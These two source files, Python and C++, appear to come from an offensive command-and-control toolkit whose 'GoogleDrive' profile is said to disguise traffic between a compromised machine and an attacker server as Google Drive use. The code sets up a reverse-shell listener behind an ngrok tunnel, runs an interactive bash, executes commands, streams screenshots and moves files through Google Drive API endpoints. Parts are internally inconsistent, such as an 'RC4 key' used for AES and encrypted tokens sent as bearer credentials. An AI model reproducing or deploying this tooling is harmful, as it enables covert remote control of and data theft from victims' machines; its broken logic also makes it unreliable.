File: Profiles/GoogleDrive.py
# This script integrates Google Drive API functionality to facilitate communication between the compromised system and the attacker-controlled server, thereby potentially hiding the traffic within legitimate Google Drive communication.

print('''\033[93m
                                            
                             ..........                             
                            ++-:::::::::                            
                           ++++=:::::::::                           
                          +++++++:::::::::                          
                         ++++++++*:::::::::                         
                        +++++++++  :::::::::                        
                       +++++++++    :::::::::                       
                      +++++++++      :::::::::.                     
                    :+++++++++        :::::::::.                    
                    ++++++++*+++++++++++++++++++                    
                     ++++++**++++++++++++++++++                     
                      *+++*+++++++++++++++++++                      
                       *+*+++++++++++++++++++            
                       
  ________                      __         ________         __              
 /  _____/  ____   ____   ____ |  |   ____ \______ \_______|__|__  __ ____  
/   \  ___ /  _ \ /  _ \ / ___\|  | _/ __ \ |    |  \_  __ \  \  \/ // __ \ 
\    \_\  (  <_> |  <_> ) /_/  >  |_\  ___/ |    `   \  | \/  |\   /\  ___/ 
 \______  /\____/ \____/\___  /|____/\___  >_______  /__|  |__| \_/  \___  >
        \/             /_____/           \/        \/                    \/ 
                                                                                  
\033[0m''')

# Importing necessary libraries
import subprocess
import time
import socket
import base64
import os
import pyautogui
from pyvirtualdisplay import Display
import random
import shutil
import requests
from Crypto.Cipher import ARC4
import secrets

# Colors for output formatting
BLUE = '\033[94m'
GREEN = '\033[92m'
RED = '\033[91m'
YELLOW = '\033[93m'
RESET = '\033[0m'

# Function to generate a random key for encryption
def generate_random_key(length):
    return secrets.token_bytes(length)

# Function to get attacker information
def get_attacker_info():
    attacker_ip = input("[+] Enter the IP for the reverse shell: ")
    return attacker_ip

# Function to encrypt access token using RC4
def encrypt_access_token(token, key_length):
    key = generate_random_key(key_length)
    cipher = ARC4.new(key)
    encrypted_token = cipher.encrypt(token.encode())
    return base64.b64encode(encrypted_token).decode()

# Main function
def main():
    try:
        # Gathering required information
        access_token = input("[+] Enter your Google Drive API access token: ")
        ip = get_attacker_info()
        port = input("[+] Enter the port number for the reverse shell and ngrok: ")
        key_length = int(input("[+] Enter the length of the RC4 key (in bytes): "))

        print(GREEN + "[*] Starting ngrok tunnel..." + RESET)
        # Starting ngrok tunnel
        ngrok_process = subprocess.Popen(['ngrok', 'tcp', port])
        time.sleep(3)  # Giving ngrok some time to establish the tunnel

        # Encrypting access token
        access_token_encrypted = encrypt_access_token(access_token, key_length)

        # Defining headers for Google Drive API
        headers = {
            "Authorization": f"Bearer {access_token_encrypted}",
            "Content-Type": "application/json",
            "User-Agent": "GoogleDrive-API-Client/1.0",
            "Connection": "keep-alive",
            "Accept-Encoding": "gzip, deflate, br",
            "Accept-Language": "en-US,en;q=0.9"
        }

        # Creating socket
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind((ip, int(port)))  # Binding to the port specified by the attacker
        s.listen(1)
        print(YELLOW + "[!] Waiting for incoming connection..." + RESET)
        client_socket, addr = s.accept()

        # Starting shell
        shell = subprocess.Popen(['/bin/bash', '-i'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)

        # Starting display
        display = Display(visible=0, size=(800, 600))
        display.start()

        # Main loop
        while True:
            command = input(RED + "[*] Bear>> " + RESET)
            if command.lower() == "exit":
                break
            
            time.sleep(random.uniform(1, 5))
            
            result = subprocess.run(command, shell=True, capture_output=True, text=True)
            stdout = result.stdout
            stderr = result.stderr

            client_socket.send(command.encode())

            if stdout:
                print(GREEN + stdout + RESET)
                print(GREEN + "[+] Command executed successfully!" + RESET)
                client_socket.send(stdout.encode())
            else:
                print(RED + "[!] No output returned from the victim's machine." + RESET)

            if stderr:
                client_socket.send(stderr.encode())

            if command.lower() == "screen":
                screen = pyautogui.screenshot()
                screen_data = base64.b64encode(screen.tobytes()).decode('utf-8')

                client_socket.send(screen_data.encode())

                while True:
                    try:
                        screen = pyautogui.screenshot()
                        screen_data = base64.b64encode(screen.tobytes()).decode('utf-8')

                        client_socket.send(screen_data.encode())

                        time.sleep(0.1)
                    except KeyboardInterrupt:
                        print("\nScreen session ended.")
                        break

            elif command.lower() == "upload":
                file_path = input("Enter the path of the file to upload: ")
                file_name = os.path.basename(file_path)
                with open(file_path, "rb") as f:
                    file_data = f.read()
                url = "https://www.googleapis.com/upload/drive/v3/files?uploadType=media"
                response = requests.post(url, headers=headers, data=file_data)
                client_socket.send(response.text.encode())

            elif command.lower() == "download":
                file_path = input("Enter the path of the file to download: ")
                url = f"https://www.googleapis.com/drive/v3/files/{file_path}?alt=media"
                response = requests.get(url, headers=headers)
                with open(os.path.basename(file_path), "wb") as f:
                    f.write(response.content)
                client_socket.send("File downloaded successfully.".encode())

            elif command.lower() == "list_files":
                url = "https://www.googleapis.com/drive/v3/files"
                response = requests.get(url, headers=headers)
                client_socket.send(response.text.encode())

        # Closing sockets and display
        client_socket.close()
        s.close()
        display.stop()

        # Terminating ngrok process
        ngrok_process.terminate()

    except Exception as e:
        print(RED + f"Error: {e}" + RESET)

if __name__ == "__main__":
    main()

File: Profiles/GoogleDrive.cpp
//g++ -o GoogleDrive.o GoogleDrive.cpp -lcurl -lssl -lcrypto -lpthread
#include <iostream>
#include <string>
#include <cstdlib>
#include <cstring>
#include <unistd.h>
#include <arpa/inet.h>
#include <openssl/evp.h>
#include <openssl/rand.h>
#include <cstdio>
#include <vector>
#include <thread>
#include <chrono>
#include <sstream>
#include <curl/curl.h>
#include <fstream>

using namespace std;

// Color definitions
#define RESET "\033[0m"
#define RED "\033[91m"
#define GREEN "\033[92m"
#define YELLOW "\033[93m"
#define BLUE "\033[94m"

// ASCII Art Banner
void print_banner() {
    cout << YELLOW << R"(
                             ..........                             
                            ++-:::::::::                            
                           ++++=:::::::::                           
                          +++++++:::::::::                          
                         ++++++++*:::::::::                         
                        +++++++++  :::::::::                        
                       +++++++++    :::::::::                       
                      +++++++++      :::::::::.                     
                    :+++++++++        :::::::::.                    
                    ++++++++*+++++++++++++++++++                    
                     ++++++**++++++++++++++++++                     
                      *+++*+++++++++++++++++++                      
                       *+*+++++++++++++++++++            
                       
  ________                      __         ________         __              
 /  _____/  ____   ____   ____ |  |   ____ \______ \_______|__|__  __ ____  
/   \  ___ /  _ \ /  _ \ / ___\|  | _/ __ \ |    |  \_  __ \  \  \/ // __ \ 
\    \_\  (  <_> |  <_> ) /_/  >  |_\  ___/ |    `   \  | \/  |\   /\  ___/ 
 \______  /\____/ \____/\___  /|____/\___  >_______  /__|  |__| \_/  \___  >
        \/             /_____/           \/        \/                    \/ 
    )" << RESET << endl;
}

// Function to encrypt access token using AES
string encrypt_access_token(const string& token, const string& key) {
    EVP_CIPHER_CTX* ctx = EVP_CIPHER_CTX_new();
    unsigned char iv[EVP_MAX_IV_LENGTH];
    RAND_bytes(iv, sizeof(iv));

    vector<unsigned char> ciphertext(token.size() + EVP_CIPHER_block_size(EVP_aes_256_cbc()));

    int len;
    EVP_EncryptInit_ex(ctx, EVP_aes_256_cbc(), nullptr, (unsigned char*)key.c_str(), iv);
    EVP_EncryptUpdate(ctx, ciphertext.data(), &len, (unsigned char*)token.c_str(), token.size());

    int ciphertext_len = len;
    EVP_EncryptFinal_ex(ctx, ciphertext.data() + len, &len);
    ciphertext_len += len;

    EVP_CIPHER_CTX_free(ctx);
    
    string encrypted_data(reinterpret_cast<char*>(ciphertext.data()), ciphertext_len);
    return string(reinterpret_cast<char*>(iv), sizeof(iv)) + encrypted_data; // Prepend IV
}

// Function to handle socket communication
void handle_socket(int client_socket) {
    string command;
    while (true) {
        cout << RED << "[*] Bear>> " << RESET;
        getline(cin, command);
        if (command == "exit") break;

        // Execute command
        FILE* pipe = popen(command.c_str(), "r");
        if (!pipe) {
            cerr << RED << "[!] Error executing command." << RESET << endl;
            continue;
        }

        char buffer[128];
        string result;
        while (fgets(buffer, sizeof(buffer), pipe) != nullptr) {
            result += buffer;
        }
        int return_code = pclose(pipe);

        // Check if the command was executed successfully
        if (return_code == 0) {
            cout << GREEN << "[+] Command executed successfully!" << RESET << endl;
            // Send output back to the client
            send(client_socket, result.c_str(), result.size(), 0);
            cout << GREEN << result << RESET; // Print the command output
        } else {
            cout << RED << "[!] No output returned from the victim's machine." << RESET << endl;
        }
    }
}

// Function to start the ngrok tunnel
void start_ngrok(const string& port) {
    string command = "ngrok tcp " + port + " > ngrok.log 2>&1";
    system(command.c_str());
}

// Main function
int main() {
    print_banner(); // Print ASCII banner

    string access_token;
    string ip;
    string port;
    string rc4_key;

    cout << "[+] Enter your Google Drive API access token: ";
    getline(cin, access_token);
    
    cout << "[+] Enter the IP for the reverse shell: ";
    getline(cin, ip);

    cout << "[+] Enter the port number for the reverse shell and ngrok: ";
    getline(cin, port);

    cout << "[+] Enter the RC4 key: ";
    getline(cin, rc4_key);

    // Start ngrok tunnel
    thread ngrok_thread(start_ngrok, port);
    this_thread::sleep_for(chrono::seconds(5)); // Wait for ngrok to initialize

    // Encrypt access token
    string encrypted_token = encrypt_access_token(access_token, rc4_key);
    cout << GREEN << "[+] Encrypted access token." << RESET << endl;

    // Create socket
    int server_socket = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in server_addr, client_addr;
    socklen_t client_len = sizeof(client_addr);

    server_addr.sin_family = AF_INET;
    server_addr.sin_addr.s_addr = inet_addr(ip.c_str());
    server_addr.sin_port = htons(stoi(port));

    if (bind(server_socket, (struct sockaddr*)&server_addr, sizeof(server_addr)) < 0) {
        cerr << RED << "[!] Error binding socket." << RESET << endl;
        return 1;
    }

    listen(server_socket, 1);
    cout << GREEN << "[+] Waiting for incoming connection..." << RESET << endl;

    int client_socket = accept(server_socket, (struct sockaddr*)&client_addr, &client_len);
    cout << GREEN << "[+] Connection established!" << RESET << endl;

    // Handle socket communication
    handle_socket(client_socket);

    // Cleanup
    close(client_socket);
    close(server_socket);
    ngrok_thread.join();

    return 0;
}

